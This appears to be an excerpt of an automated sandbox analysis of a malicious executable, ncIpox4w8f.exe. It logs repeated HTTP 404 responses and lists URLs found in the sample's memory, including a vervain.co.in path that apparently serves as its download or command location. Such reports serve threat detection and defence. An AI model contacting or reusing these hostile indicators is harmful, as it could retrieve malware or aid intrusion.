                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:31 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:32 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:34 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:36 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:40 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:42 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:43 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:44 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:47 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:52 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:55 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:56 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:57 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:58 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:00 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:03 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:05 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:08 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:13 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:14 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:18 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:10:22 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: ncIpox4w8f.exe, 00000000.00000002.515000717.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: ncIpox4w8f.exeString found in binary or memory: http://www.emerge.de
                Source: ncIpox4w8f.exe, 00000000.00000003.348605602.000000000581A000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.374747011.0000000005726000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.248325276.0000000005350000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.304035366.0000000005614000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.350592323.0000000005833000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293371459.000000000561C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.501025618.000000000591C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.400260793.0000000005904000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445878505.0000000005921000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.334512087.000000000536E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.261256374.000000000541C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.546359558.00000000058FC000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.248105696.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.387645922.0000000005915000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266085426.000000000542C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286385327.00000000053E8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.391278569.0000000005914000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.260726768.00000000054E9000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.355852428.0000000005851000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.emerge.deDVarFileInfo$
                Source: ncIpox4w8f.exe, ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pregrad.net
                Source: ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.256226314.0000000005450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pregrad.netopenU
                Source: ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.486329715.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.348023678.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t
